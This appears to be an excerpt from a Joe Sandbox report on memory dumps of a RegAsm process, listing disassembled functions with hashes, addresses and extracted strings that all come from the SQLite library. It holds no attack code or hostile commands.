Uniqueness Score: -1.00%

Function 19C56F30 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 83COMMON

Download Yara Rule

Strings

invalid, xrefs: 19C56F4F
%s at line %d of [%.10s], xrefs: 19C56F6F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C56F60
out of memory, xrefs: 19C56F39, 19C56FA0
bad parameter or other API misuse, xrefs: 19C56F7E
API call with %s database connection pointer, xrefs: 19C56F54
misuse, xrefs: 19C56F6A

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$bad parameter or other API misuse$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$out of memory
API String ID: 0-2911740470
Opcode ID: c657100176c4055965cd6e4eb1537c80755f1878575609b544eb891499ab82c5
Instruction ID: 0eadb171a9a3859e5644ff3d276b75d23646ff17b236adf6f5a3a4149687d082
Opcode Fuzzy Hash: c657100176c4055965cd6e4eb1537c80755f1878575609b544eb891499ab82c5
Instruction Fuzzy Hash: 11216772F0435097FB218229FD45B9B73A26BC0316FAC8638E0C757281D631E882C389

Uniqueness

Uniqueness Score: -1.00%

Function 19D06380 Relevance: 15.1, APIs: 10, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d6b4d25c02912e81a660b64506e79613ffa2484fff20d3f7eb93c5910bfc55
Instruction ID: 8a93aa6e454d68b411b020dbb621d754bb11b9e20fc009256fd224593f7bc17d
Opcode Fuzzy Hash: 12d6b4d25c02912e81a660b64506e79613ffa2484fff20d3f7eb93c5910bfc55
Instruction Fuzzy Hash: 8A419170800660DFC712AF35EC8CA07B7BCAF20659F5D5528E88AD2A51DB32F454DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C7F4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: e9fb50de0d997511bf126157a9b4f9e83a0b71fd423e892f2045faafe9b263e0
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: 5821826B9103926BE70A9A20FC41F7F639C6F81215F4D8458FAD5A2180FB64A65982A3

Uniqueness

Uniqueness Score: -1.00%

Function 19C3E170 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 445COMMON

Download Yara Rule

Strings

unicode61, xrefs: 19CB1279, 19CB130F
fts5_source_id, xrefs: 19CB148D, 19CB14E0
porter, xrefs: 19CB12BF
fts5vocab, xrefs: 19CB1340
fts5, xrefs: 19CB1053, 19CB1395, 19CB13E7
snippet, xrefs: 19CB1200
unable to delete/modify user-function due to active statements, xrefs: 19CB13BF, 19CB14B8

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5$fts5_source_id$fts5vocab$porter$snippet$unable to delete/modify user-function due to active statements$unicode61
API String ID: 0-2986783930
Opcode ID: 91e57fd5d5ddb01939f5a8537ae3ffdb7d13bf7998a4f0a60efdb2d8ae8a2193
Instruction ID: 5e5d360cc26e5f2c51a8e71a7a1093c92ee5e8b564785b7ac72cdbfb4efd147b
Opcode Fuzzy Hash: 91e57fd5d5ddb01939f5a8537ae3ffdb7d13bf7998a4f0a60efdb2d8ae8a2193
Instruction Fuzzy Hash: 10F1D2B1904741EBD701DF35EC89B177BA8BF90384F484528E88BDB281E775E654CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D3FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D3FBA5
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D3FB96
API called with finalized prepared statement, xrefs: 19D3FB7A
misuse, xrefs: 19D3FBA0
API called with NULL prepared statement, xrefs: 19D3FB65

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: ed8f61540d03391c116f42acde26da1c5beadfdc2fdf3297e8b5e5b32c656cef
Instruction ID: e2d859e67a92934543794294e703840af452fae2d397ed2cfcc0f558fad4d9df
Opcode Fuzzy Hash: ed8f61540d03391c116f42acde26da1c5beadfdc2fdf3297e8b5e5b32c656cef
Instruction Fuzzy Hash: F6B1E2F49043498BE7108F38D849B1777E4BB4430BF88496CE8CA97B81E775E605C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19CB1710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

CREATE TABLE x(, xrefs: 19CB17D9
%z, %Q HIDDEN, %s HIDDEN), xrefs: 19CB1831
%z%s%Q, xrefs: 19CB180D
rank, xrefs: 19CB1824

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: 3c31715d1fc0e8d13b50384571acb376bd1d5d5dc1216c0315b037c2b5ba07fe
Instruction ID: 2484b597b112b812af601eacf98b3cff64c6f3a8743f42d26a5dbe3091191a39
Opcode Fuzzy Hash: 3c31715d1fc0e8d13b50384571acb376bd1d5d5dc1216c0315b037c2b5ba07fe
Instruction Fuzzy Hash: EA81E772E00251DFDB019F64EC48A5B77E8FF84295F090629FC89EB251D736E950CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C7E320 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C7E385
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C7E376
API called with finalized prepared statement, xrefs: 19C7E36A
misuse, xrefs: 19C7E380

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3620335220
Opcode ID: 556b4101231d7952165f1f1e13c2ee81e6e33a1ea0708658a0fba5edc6de86a2
Instruction ID: 754becd3ee3bb18a57bf355bca33462e6eee6a7141830b7d7cc60d563ce2adef
Opcode Fuzzy Hash: 556b4101231d7952165f1f1e13c2ee81e6e33a1ea0708658a0fba5edc6de86a2
Instruction Fuzzy Hash: 805182B2C003A5EBE706AB74E88CB5B3768AB14345F0C8025ED8DD7290D735B554CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D274A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

invalid, xrefs: 19D274BC
%s at line %d of [%.10s], xrefs: 19D274DC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D274CD
unable to close due to unfinalized statements or unfinished backups, xrefs: 19D275D1
API call with %s database connection pointer, xrefs: 19D274C1
misuse, xrefs: 19D274D7

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: 12e3caa86a398c1f51e6c75fffe1eeb63b7c7d98c2d82b5e29328ee1541f5a3b
Instruction ID: 9c3df0ae6a343063e69e5347e81a5c513a9e36dd04664e6d3a3b7e191b45e06c
Opcode Fuzzy Hash: 12e3caa86a398c1f51e6c75fffe1eeb63b7c7d98c2d82b5e29328ee1541f5a3b
Instruction Fuzzy Hash: CF512975D00751ABD3219B38EC48B5BB7A9AF50719F8E4028E899D3B81EB30F545C6A3

Uniqueness

Uniqueness Score: -1.00%

Function 19CCBCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

PRAGMA %Q.page_size, xrefs: 19CCBD03
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 19CCBD67
undersize RTree blobs in "%q_node", xrefs: 19CCBDA1

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: fd271a351e40b4aae658842ca05780ebb9eaa8a4f974fb2426673f39ec2b1b65
Instruction ID: 9d3c665382377c1a3d40046913b2888489a78e67f2a505c92135fe254e60efa8
Opcode Fuzzy Hash: fd271a351e40b4aae658842ca05780ebb9eaa8a4f974fb2426673f39ec2b1b65
Instruction Fuzzy Hash: EF3127B1D00212EFE301AFB5EC88A577BACEB44755F084525FC89D2301D736E954DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19D232F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19D236C7, 19D2370C, 19D2376C, 19D2381D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D236B8, 19D236FD, 19D2375D, 19D2380E
database corruption, xrefs: 19D236C2, 19D23707, 19D23767, 19D23818

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 9b52e05e1498cdf2931882b8808f7134d1595c1c211eee2fb3e500102e0359ab
Instruction ID: afe86bb7cb4a725c64b00b68e3e0c5fdc766e14f5387e7b7c1fc8d4cda9b12e3
Opcode Fuzzy Hash: 9b52e05e1498cdf2931882b8808f7134d1595c1c211eee2fb3e500102e0359ab
Instruction Fuzzy Hash: D8F15774A046529FD700DF28C8807A7FBF0FF44719F9845A9E888C7A81EB35E956C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C528E5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON

Download Yara Rule

Strings

malformed inverted index for FTS5 table %s.%s, xrefs: 19C52A8A
INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 19C529F1
unable to validate the inverted index for FTS5 table %s.%s: %s, xrefs: 19C52AA0

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS5 table %s.%s$unable to validate the inverted index for FTS5 table %s.%s: %s
API String ID: 0-3572959941
Opcode ID: 0fcb3f8657ef0732879b784257647c4810c8bab702a5b5b75f1d62a146328c91
Instruction ID: 542d960fd5fa8eb483ae85cf958c91fbce43f8ef16af1f86256010a8ef4a8939
Opcode Fuzzy Hash: 0fcb3f8657ef0732879b784257647c4810c8bab702a5b5b75f1d62a146328c91
Instruction Fuzzy Hash: 0A41C672E01261EBE311AF75EC8CA9777EDEF44355F080529F88AC2240DB319654CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 19C39700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 19C398D3

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: 6454d049f26396c1f99360f430485fc4f8d62548704368b30aca8e75ba8e9ee1
Instruction ID: 3588e5cb59c9fa923a278aed8b391029870d562e9dc0489d73e837ed81950c6e
Opcode Fuzzy Hash: 6454d049f26396c1f99360f430485fc4f8d62548704368b30aca8e75ba8e9ee1
Instruction Fuzzy Hash: 6881D3777092009FD7009E68FC40B66F3A1FB85236F6846BEE58A866E1E732E510CB51

Uniqueness

Uniqueness Score: -1.00%

Function 19DB8D80 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 271COMMON

Download Yara Rule

Strings

%s-shm, xrefs: 19DB8DF2
winOpenShm, xrefs: 19DB8FB9
readonly_shm, xrefs: 19DB8F52

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 0-2815843928
Opcode ID: 702f4b899b62567fefb88e1cb585f5aecb4c79c3393214835c76f54b19b503ba
Instruction ID: ad0eec0e9b52df2faaca02acd4ac6b8aa840e66465e393d755080351ab86dfb8
Opcode Fuzzy Hash: 702f4b899b62567fefb88e1cb585f5aecb4c79c3393214835c76f54b19b503ba
Instruction Fuzzy Hash: 1891CBB0D003919FDB11AF74DC89B1777A8AB15344F084129FD4BDA681EB36E914CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 19C4EB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

%.*s%s, xrefs: 19C4EC88
%s at line %d of [%.10s], xrefs: 19C4ECDA
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C4ECCB
database corruption, xrefs: 19C4ECD5

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
